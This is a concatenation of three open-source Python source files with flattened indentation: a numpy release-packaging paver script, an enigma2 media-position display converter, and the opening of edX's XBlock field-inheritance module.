mpkg_source = os.path.join("dist", mpkg_name(pyver))
mpkg_target = os.path.join(content, "numpy-%s-py%s.mpkg" % (FULLVERSION, pyver))
shutil.copytree(mpkg_source, mpkg_target)
# Copy docs into image source
pdf_docs = os.path.join(content, "Documentation")
if os.path.exists(pdf_docs):
shutil.rmtree(pdf_docs)
os.makedirs(pdf_docs)
shutil.copy(user, os.path.join(pdf_docs, "userguide.pdf"))
shutil.copy(ref, os.path.join(pdf_docs, "reference.pdf"))
# Build the dmg
cmd = ["./new-create-dmg", "--pkgname", os.path.basename(mpkg_target),
"--volname", "numpy", os.path.basename(dmg), "./content"]
st = subprocess.check_call(cmd, cwd=macosx_installer_dir)
source = dmg
target = os.path.join(idirs, os.path.basename(dmg))
if not os.path.exists(os.path.dirname(target)):
os.makedirs(os.path.dirname(target))
shutil.copy(source, target)
#--------------------------
# Source distribution stuff
#--------------------------
def tarball_name(type='gztar'):
root = 'numpy-%s' % FULLVERSION
if type == 'gztar':
return root + '.tar.gz'
elif type == 'zip':
return root + '.zip'
raise ValueError("Unknown type %s" % type)
@task
def sdist(options):
# First clean the repo and update submodules (for up-to-date doc html theme
# and Sphinx extensions)
sh('git clean -xdf')
sh('git submodule init')
sh('git submodule update')
# To be sure to bypass paver when building sdist... paver + numpy.distutils
# do not play well together.
# Cython is run over all Cython files in setup.py, so generated C files
# will be included.
sh('python setup.py sdist --formats=gztar,zip')
# Copy the superpack into installers dir
idirs = options.installers.installersdir
if not os.path.exists(idirs):
os.makedirs(idirs)
for t in ['gztar', 'zip']:
source = os.path.join('dist', tarball_name(t))
target = os.path.join(idirs, tarball_name(t))
shutil.copy(source, target)
def compute_md5(idirs):
released = paver.path.path(idirs).listdir()
checksums = []
for f in sorted(released):
m = md5(open(f, 'r').read())
checksums.append('%s %s' % (m.hexdigest(), os.path.basename(f)))
return checksums
def compute_sha256(idirs):
# better checksum so gpg signed README.txt containing the sums can be used
# to verify the binaries instead of signing all binaries
released = paver.path.path(idirs).listdir()
checksums = []
for f in sorted(released):
m = sha256(open(f, 'r').read())
checksums.append('%s %s' % (m.hexdigest(), os.path.basename(f)))
return checksums
def write_release_task(options, filename='NOTES.txt'):
idirs = options.installers.installersdir
source = paver.path.path(RELEASE_NOTES)
target = paver.path.path(filename)
if target.exists():
target.remove()
source.copy(target)
ftarget = open(str(target), 'a')
ftarget.writelines("""
Checksums
=========
MD5
~~~
""")
ftarget.writelines(['%s\n' % c for c in compute_md5(idirs)])
ftarget.writelines("""
SHA256
~~~~~~
""")
ftarget.writelines(['%s\n' % c for c in compute_sha256(idirs)])
def write_log_task(options, filename='Changelog'):
st = subprocess.Popen(
['git', 'log', '--no-merges', '--use-mailmap',
'%s..%s' % (LOG_START, LOG_END)],
stdout=subprocess.PIPE)
out = st.communicate()[0]
a = open(filename, 'w')
a.writelines(out)
a.close()
@task
def write_release(options):
write_release_task(options)
@task
def write_log(options):
write_log_task(options)
@task
def write_release_and_log(options):
rdir = options.installers.releasedir
write_release_task(options, os.path.join(rdir, 'NOTES.txt'))
write_log_task(options, os.path.join(rdir, 'Changelog'))
| bsd-3-clause |
oe-alliance/oe-alliance-enigma2 | lib/python/Components/Converter/ServicePosition.py | 31 | 21550 | from Converter import Converter
from Poll import Poll
from enigma import iPlayableService
from Components.Element import cached, ElementError
from Components.config import config
class ServicePosition(Poll, Converter, object):
TYPE_LENGTH = 0
TYPE_POSITION = 1
TYPE_REMAINING = 2
TYPE_GAUGE = 3
TYPE_SUMMARY = 4
TYPE_VFD_LENGTH = 5
TYPE_VFD_POSITION = 6
TYPE_VFD_REMAINING = 7
TYPE_VFD_GAUGE = 8
TYPE_VFD_SUMMARY = 9
def __init__(self, type):
Poll.__init__(self)
Converter.__init__(self, type)
args = type.split(',')
type = args.pop(0)
self.negate = 'Negate' in args
self.detailed = 'Detailed' in args
self.showHours = 'ShowHours' in args
self.showNoSeconds = 'ShowNoSeconds' in args
if type == "Length":
self.type = self.TYPE_LENGTH
elif type == "Position":
self.type = self.TYPE_POSITION
elif type == "Remaining":
self.type = self.TYPE_REMAINING
elif type == "Gauge":
self.type = self.TYPE_GAUGE
elif type == "Summary":
self.type = self.TYPE_SUMMARY
elif type == "VFDLength":
self.type = self.TYPE_VFD_LENGTH
elif type == "VFDPosition":
self.type = self.TYPE_VFD_POSITION
elif type == "VFDRemaining":
self.type = self.TYPE_VFD_REMAINING
elif type == "VFDGauge":
self.type = self.TYPE_VFD_GAUGE
elif type == "VFDSummary":
self.type = self.TYPE_VFD_SUMMARY
else:
raise ElementError("type must be {Length|Position|Remaining|Gauge|Summary} with optional arguments {Negate|Detailed|ShowHours|ShowNoSeconds} for ServicePosition converter")
if self.detailed:
self.poll_interval = 100
elif self.type == self.TYPE_LENGTH or self.type == self.TYPE_VFD_LENGTH:
self.poll_interval = 2000
else:
self.poll_interval = 500
self.poll_enabled = True
def getSeek(self):
s = self.source.service
return s and s.seek()
@cached
def getPosition(self):
seek = self.getSeek()
if seek is None:
return None
pos = seek.getPlayPosition()
if pos[0]:
return 0
return pos[1]
@cached
def getLength(self):
seek = self.getSeek()
if seek is None:
return None
length = seek.getLength()
if length[0]:
return 0
return length[1]
@cached
def getCutlist(self):
service = self.source.service
cue = service and service.cueSheet()
return cue and cue.getCutList()
@cached
def getText(self):
seek = self.getSeek()
if seek is None:
return ""
if self.type == self.TYPE_SUMMARY or self.type == self.TYPE_SUMMARY:
s = self.position / 90000
e = (self.length / 90000) - s
return "%02d:%02d +%2dm" % (s/60, s%60, e/60)
l = self.length
p = self.position
r = self.length - self.position # Remaining
if l < 0:
return ""
if not self.detailed:
l /= 90000
p /= 90000
r /= 90000
if self.negate: l = -l
if self.negate: p = -p
if self.negate: r = -r
if l >= 0:
sign_l = ""
else:
l = -l
sign_l = "-"
if p >= 0:
sign_p = ""
else:
p = -p
sign_p = "-"
if r >= 0:
sign_r = ""
else:
r = -r
sign_r = "-"
if self.type < 5:
if config.usage.elapsed_time_positive_osd.value:
sign_p = "+"
sign_r = "-"
sign_l = ""
else:
sign_p = "-"
sign_r = "+"
sign_l = ""
if config.usage.swap_media_time_display_on_osd.value == "1": # Mins
if self.type == self.TYPE_LENGTH:
return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
elif self.type == self.TYPE_POSITION:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
return sign_p + "%d " % (p/60) + sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return sign_r + "%d " % (r/60) + sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
else:
return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
elif self.type == self.TYPE_REMAINING:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
elif config.usage.swap_media_time_display_on_osd.value == "2": # Mins Secs
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d" % (l/60, l%60)
elif self.type == self.TYPE_POSITION:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/60, p%60)
elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
return sign_p + "%d:%02d " % (p/60, p%60) + sign_r + "%d:%02d" % (r/60, r%60)
elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return sign_r + "%d:%02d " % (r/60, r%60) + sign_p + "%d:%02d" % (p/60, p%60)
else:
return sign_r + "%d:%02d" % (r/60, r%60)
elif self.type == self.TYPE_REMAINING:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/60, p%60)
elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + "%d:%02d" % (r/60, r%60)
elif config.usage.swap_media_time_display_on_osd.value == "3": # Hours Mins
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d" % (l/3600, l%3600/60)
elif self.type == self.TYPE_POSITION:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/3600, p%3600/60)
elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
return sign_p + "%d:%02d " % (p/3600, p%3600/60) + sign_r + "%d:%02d" % (r/3600, r%3600/60)
elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return sign_r + "%d:%02d " % (r/3600, r%3600/60) + sign_p + "%d:%02d" % (p/3600, p%3600/60)
else:
return sign_r + "%d:%02d" % (r/3600, r%3600/60)
elif self.type == self.TYPE_REMAINING:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/3600, p%3600/60)
elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + "%d:%02d" % (r/3600, r%3600/60)
elif config.usage.swap_media_time_display_on_osd.value == "4": # Hours Mins Secs
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
elif self.type == self.TYPE_POSITION:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
return sign_p + "%d:%02d:%02d " % (p/3600, p%3600/60, p%60) + sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return sign_r + "%d:%02d:%02d " % (r/3600, r%3600/60, r%60) + sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
else:
return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
elif self.type == self.TYPE_REMAINING:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
elif config.usage.swap_media_time_display_on_osd.value == "5": # Percentage
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d" % (l/3600, l%3600/60)
elif self.type == self.TYPE_POSITION:
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
try:
return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
elif config.usage.swap_time_remaining_on_osd.value == "2": # Elapsed & Remaining
try:
return sign_p + "%d%% " % ((float(p + 0.0) / float(l + 0.0)) * 100) + sign_r + "%d%%" % ((float(r + 0.0) / float(l + 0.0)) * 100 + 1)
except:
return ""
elif config.usage.swap_time_remaining_on_osd.value == "3": # Remaining & Elapsed
try:
return sign_r + "%d%% " % ((float(r + 0.0) / float(l + 0.0)) * 100 +1 ) + sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
else:
try:
return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
elif self.type == self.TYPE_REMAINING:
test = 0
if config.usage.swap_time_remaining_on_osd.value == "1": # Elapsed
try:
return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
elif config.usage.swap_time_remaining_on_osd.value == "2" or config.usage.swap_time_remaining_on_osd.value == "3": # Elapsed & Remaining
return ""
else:
try:
return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
else: # Skin Setting
if not self.detailed:
if self.showHours:
if self.showNoSeconds:
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d" % (l/3600, l%3600/60)
elif self.type == self.TYPE_POSITION:
return sign_p + "%d:%02d" % (p/3600, p%3600/60)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d" % (r/3600, r%3600/60)
else:
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
elif self.type == self.TYPE_POSITION:
return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
else:
if self.showNoSeconds:
if self.type == self.TYPE_LENGTH:
return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
elif self.type == self.TYPE_POSITION:
return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
elif self.type == self.TYPE_REMAINING:
return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
else:
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d" % (l/60, l%60)
elif self.type == self.TYPE_POSITION:
return sign_p + "%d:%02d" % (p/60, p%60)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d" % (r/60, r%60)
else:
if self.showHours:
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d:%02d:%03d" % ((l/3600/90000), (l/90000)%3600/60, (l/90000)%60, (l%90000)/90)
elif self.type == self.TYPE_POSITION:
return sign_r + "%d:%02d:%02d:%03d" % ((r/3600/90000), (r/90000)%3600/60, (r/90000)%60, (r%90000)/90)
elif self.type == self.TYPE_REMAINING:
return sign_p + "%d:%02d:%02d:%03d" % ((p/3600/90000), (p/90000)%3600/60, (p/90000)%60, (p%90000)/90)
else:
if self.type == self.TYPE_LENGTH:
return sign_l + "%d:%02d:%03d" % ((l/60/90000), (l/90000)%60, (l%90000)/90)
elif self.type == self.TYPE_POSITION:
return sign_p + "%d:%02d:%03d" % ((p/60/90000), (p/90000)%60, (p%90000)/90)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d:%03d" % ((r/60/90000), (r/90000)%60, (r%90000)/90)
else:
if config.usage.elapsed_time_positive_vfd.value:
sign_p = "+"
sign_r = "-"
else:
sign_p = "-"
sign_r = "+"
if config.usage.swap_media_time_display_on_vfd.value == "1": # Mins
if self.type == self.TYPE_VFD_LENGTH:
return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
elif self.type == self.TYPE_VFD_POSITION:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
return sign_p + "%d " % (p/60) + sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return sign_r + "%d " % (r/60) + sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
else:
return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
elif self.type == self.TYPE_VFD_REMAINING:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
elif config.usage.swap_media_time_display_on_vfd.value == "2": # Mins Secs
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d" % (l/60, l%60)
elif self.type == self.TYPE_VFD_POSITION:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/60, p%60)
elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
return sign_p + "%d:%02d " % (p/60, p%60) + sign_r + "%d:%02d" % (r/60, r%60)
elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return sign_r + "%d:%02d " % (r/60, r%60) + sign_p + "%d:%02d" % (p/60, p%60)
else:
return sign_r + "%d:%02d" % (r/60, r%60)
elif self.type == self.TYPE_VFD_REMAINING:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/60, p%60)
elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + "%d:%02d" % (r/60, r%60)
elif config.usage.swap_media_time_display_on_vfd.value == "3": # Hours Mins
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d" % (l/3600, l%3600/60)
elif self.type == self.TYPE_VFD_POSITION:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/3600, p%3600/60)
elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
return sign_p + "%d:%02d " % (p/3600, p%3600/60) + sign_r + "%d:%02d" % (r/3600, r%3600/60)
elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return sign_r + "%d:%02d " % (r/3600, r%3600/60) + sign_p + "%d:%02d" % (p/3600, p%3600/60)
else:
return sign_r + "%d:%02d" % (r/3600, r%3600/60)
elif self.type == self.TYPE_VFD_REMAINING:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + "%d:%02d" % (p/3600, p%3600/60)
elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + "%d:%02d" % (r/3600, r%3600/60)
elif config.usage.swap_media_time_display_on_vfd.value == "4": # Hours Mins Secs
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
elif self.type == self.TYPE_VFD_POSITION:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
return sign_p + "%d:%02d:%02d " % (p/3600, p%3600/60, p%60) + sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return sign_r + "%d:%02d:%02d " % (r/3600, r%3600/60, r%60) + sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
else:
return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
elif self.type == self.TYPE_VFD_REMAINING:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
return ""
else:
return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
elif config.usage.swap_media_time_display_on_vfd.value == "5": # Percentage
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d" % (l/3600, l%3600/60)
elif self.type == self.TYPE_VFD_POSITION:
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
try:
return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
elif config.usage.swap_time_remaining_on_vfd.value == "2": # Elapsed & Remaining
try:
return sign_p + "%d%% " % ((float(p + 0.0) / float(l + 0.0)) * 100) + sign_r + "%d%%" % ((float(r + 0.0) / float(l + 0.0)) * 100 + 1)
except:
return ""
elif config.usage.swap_time_remaining_on_vfd.value == "3": # Remaining & Elapsed
try:
return sign_r + "%d%% " % ((float(r + 0.0) / float(l + 0.0)) * 100 +1 ) + sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
else:
try:
return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
elif self.type == self.TYPE_VFD_REMAINING:
test = 0
if config.usage.swap_time_remaining_on_vfd.value == "1": # Elapsed
try:
return sign_p + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
elif config.usage.swap_time_remaining_on_vfd.value == "2" or config.usage.swap_time_remaining_on_vfd.value == "3": # Elapsed & Remaining
return ""
else:
try:
return sign_r + "%d%%" % ((float(p + 0.0) / float(l + 0.0)) * 100)
except:
return ""
else: # Skin Setting
if not self.detailed:
if self.showHours:
if self.showNoSeconds:
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d" % (l/3600, l%3600/60)
elif self.type == self.TYPE_VFD_POSITION:
return sign_p + "%d:%02d" % (p/3600, p%3600/60)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d" % (r/3600, r%3600/60)
else:
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d:%02d" % (l/3600, l%3600/60, l%60)
elif self.type == self.TYPE_VFD_POSITION:
return sign_p + "%d:%02d:%02d" % (p/3600, p%3600/60, p%60)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d:%02d" % (r/3600, r%3600/60, r%60)
else:
if self.showNoSeconds:
if self.type == self.TYPE_VFD_LENGTH:
return ngettext("%d Min", "%d Mins", (l/60)) % (l/60)
elif self.type == self.TYPE_VFD_POSITION:
return sign_p + ngettext("%d Min", "%d Mins", (p/60)) % (p/60)
elif self.type == self.TYPE_VFD_REMAINING:
return sign_r + ngettext("%d Min", "%d Mins", (r/60)) % (r/60)
else:
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d" % (l/60, l%60)
elif self.type == self.TYPE_VFD_POSITION:
return sign_p + "%d:%02d" % (p/60, p%60)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d" % (r/60, r%60)
else:
if self.showHours:
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d:%02d:%03d" % ((l/3600/90000), (l/90000)%3600/60, (l/90000)%60, (l%90000)/90)
elif self.type == self.TYPE_VFD_POSITION:
return sign_r + "%d:%02d:%02d:%03d" % ((r/3600/90000), (r/90000)%3600/60, (r/90000)%60, (r%90000)/90)
elif self.type == self.TYPE_REMAINING:
return sign_p + "%d:%02d:%02d:%03d" % ((p/3600/90000), (p/90000)%3600/60, (p/90000)%60, (p%90000)/90)
else:
if self.type == self.TYPE_VFD_LENGTH:
return sign_l + "%d:%02d:%03d" % ((l/60/90000), (l/90000)%60, (l%90000)/90)
elif self.type == self.TYPE_VFD_POSITION:
return sign_p + "%d:%02d:%03d" % ((p/60/90000), (p/90000)%60, (p%90000)/90)
elif self.type == self.TYPE_REMAINING:
return sign_r + "%d:%02d:%03d" % ((r/60/90000), (r/90000)%60, (r%90000)/90)
# range/value are for the Progress renderer
range = 10000
@cached
def getValue(self):
pos = self.position
len = self.length
if pos is None or len is None or len <= 0:
return None
return pos * 10000 / len
position = property(getPosition)
length = property(getLength)
cutlist = property(getCutlist)
text = property(getText)
value = property(getValue)
def changed(self, what):
cutlist_refresh = what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evCuesheetChanged,)
time_refresh = what[0] == self.CHANGED_POLL or what[0] == self.CHANGED_SPECIFIC and what[1] in (iPlayableService.evCuesheetChanged,)
if cutlist_refresh:
if self.type == self.TYPE_GAUGE:
self.downstream_elements.cutlist_changed()
if time_refresh:
self.downstream_elements.changed(what)
| gpl-2.0 |
nanolearningllc/edx-platform-cypress | common/lib/xmodule/xmodule/modulestore/inheritance.py | 52 | 13259 | """
Support for inheritance of fields down an XBlock hierarchy.
"""
from __future__ import absolute_import
from datetime import datetime
from pytz import UTC
from xmodule.partitions.partitions import UserPartition
from xblock.fields import Scope, Boolean, String, Float, XBlockMixin, Dict, Integer, List
from xblock.runtime import KeyValueStore, KvsFieldData
from xmodule.fields import Date, Timedelta
from django.conf import settings
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
class UserPartitionList(List):
"""Special List class for listing UserPartitions"""
def from_json(self, values):
return [UserPartition.from_json(v) for v in values]
def to_json(self, values):
return [user_partition.to_json()
for user_partition in values]
class InheritanceMixin(XBlockMixin):
"""Field definitions for inheritable fields."""
graded = Boolean(
help="Whether this module contributes to the final course grade",
scope=Scope.settings,
default=False,
)
start = Date(
help="Start time when this module is visible",
default=datetime(2030, 1, 1, tzinfo=UTC),
scope=Scope.settings
)
due = Date(
display_name=_("Due Date"),
help=_("Enter the default date by which problems are due."),
scope=Scope.settings,
)
visible_to_staff_only = Boolean(
help=_("If true, can be seen only by course staff, regardless of start date."),
default=False,
scope=Scope.settings,
)
course_edit_method = String(
display_name=_("Course Editor"),
help=_("Enter the method by which this course is edited (\"XML\" or \"Studio\")."),
default="Studio",
scope=Scope.settings,
deprecated=True # Deprecated because user would not change away from Studio within Studio.
)
giturl = String(
display_name=_("GIT URL"),
help=_("Enter the URL for the course data GIT repository."),
scope=Scope.settings
)
xqa_key = String(
display_name=_("XQA Key"),
help=_("This setting is not currently supported."), scope=Scope.settings,
deprecated=True
)
annotation_storage_url = String(
help=_("Enter the location of the annotation storage server. The textannotation, videoannotation, and imageannotation advanced modules require this setting."),
scope=Scope.settings,
default="http://your_annotation_storage.com",
display_name=_("URL for Annotation Storage")
)
annotation_token_secret = String(
help=_("Enter the secret string for annotation storage. The textannotation, videoannotation, and imageannotation advanced modules require this string."),
scope=Scope.settings,
default="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
display_name=_("Secret Token String for Annotation")
)
graceperiod = Timedelta(
help="Amount of time after the due date that submissions will be accepted",
scope=Scope.settings,
)
group_access = Dict(
help=_("Enter the ids for the content groups this problem belongs to."),
scope=Scope.settings,
)
showanswer = String(
display_name=_("Show Answer"),
help=_(
'Specify when the Show Answer button appears for each problem. '
'Valid values are "always", "answered", "attempted", "closed", '
'"finished", "past_due", "correct_or_past_due", and "never".'
),
scope=Scope.settings,
default="finished",
)
rerandomize = String(
display_name=_("Randomization"),
help=_(
'Specify the default for how often variable values in a problem are randomized. '
'This setting should be set to \"never\" unless you plan to provide a Python '
'script to identify and randomize values in most of the problems in your course. '
'Valid values are \"always\", \"onreset\", \"never\", and \"per_student\".'
),
scope=Scope.settings,
default="never",
)
days_early_for_beta = Float(
display_name=_("Days Early for Beta Users"),
help=_("Enter the number of days before the start date that beta users can access the course."),
scope=Scope.settings,
default=None,
)
static_asset_path = String(
display_name=_("Static Asset Path"),
help=_("Enter the path to use for files on the Files & Uploads page. This value overrides the Studio default, c4x://."),
scope=Scope.settings,
default='',
)
text_customization = Dict(
display_name=_("Text Customization"),
help=_("Enter string customization substitutions for particular locations."),
scope=Scope.settings,
)
use_latex_compiler = Boolean(
display_name=_("Enable LaTeX Compiler"),
help=_("Enter true or false. If true, you can use the LaTeX templates for HTML components and advanced Problem components."),
default=False,
scope=Scope.settings
)
max_attempts = Integer(
display_name=_("Maximum Attempts"),
help=_("Enter the maximum number of times a student can try to answer problems. By default, Maximum Attempts is set to null, meaning that students have an unlimited number of attempts for problems. You can override this course-wide setting for individual problems. However, if the course-wide setting is a specific number, you cannot set the Maximum Attempts for individual problems to unlimited."),
values={"min": 0}, scope=Scope.settings
)
matlab_api_key = String(
display_name=_("Matlab API key"),
help=_("Enter the API key provided by MathWorks for accessing the MATLAB Hosted Service. "
"This key is granted for exclusive use in this course for the specified duration. "
"Do not share the API key with other courses. Notify MathWorks immediately "
"if you believe the key is exposed or compromised. To obtain a key for your course, "
"or to report an issue, please contact moocsupport@mathworks.com"),
scope=Scope.settings
)
# This is should be scoped to content, but since it's defined in the policy
# file, it is currently scoped to settings.
user_partitions = UserPartitionList(
display_name=_("Group Configurations"),
help=_("Enter the configurations that govern how students are grouped together."),
default=[],
scope=Scope.settings
)
video_speed_optimizations = Boolean(
display_name=_("Enable video caching system"),
help=_("Enter true or false. If true, video caching will be used for HTML5 videos."),
default=True,
scope=Scope.settings
)
video_bumper = Dict(
display_name=_("Video Pre-Roll"),
help=_(
"""Identify a video, 5-10 seconds in length, to play before course videos. Enter the video ID from"""
""" the Video Uploads page and one or more transcript files in the following format:"""
""" {"video_id": "ID", "transcripts": {"language": "/static/filename.srt"}}."""
""" For example, an entry for a video with two transcripts looks like this:"""
""" {"video_id": "77cef264-d6f5-4cf2-ad9d-0178ab8c77be","""
""" "transcripts": {"en": "/static/DemoX-D01_1.srt", "uk": "/static/DemoX-D01_1_uk.srt"}}"""
),
scope=Scope.settings
)
reset_key = "DEFAULT_SHOW_RESET_BUTTON"
default_reset_button = getattr(settings, reset_key) if hasattr(settings, reset_key) else False
show_reset_button = Boolean(
display_name=_("Show Reset Button for Problems"),
help=_("Enter true or false. If true, problems in the course default to always displaying a 'Reset' button. You can "
"override this in each problem's settings. All existing problems are affected when this course-wide setting is changed."),
scope=Scope.settings,
default=default_reset_button
)
edxnotes = Boolean(
display_name=_("Enable Student Notes"),
help=_("Enter true or false. If true, students can use the Student Notes feature."),
default=False,
scope=Scope.settings
)
edxnotes_visibility = Boolean(
display_name="Student Notes Visibility",
help=_("Indicates whether Student Notes are visible in the course. "
"Students can also show or hide their notes in the courseware."),
default=True,
scope=Scope.user_info
)
in_entrance_exam = Boolean(
display_name=_("Tag this module as part of an Entrance Exam section"),
help=_("Enter true or false. If true, answer submissions for problem modules will be "
"considered in the Entrance Exam scoring/gating algorithm."),
scope=Scope.settings,
default=False
)
def compute_inherited_metadata(descriptor):
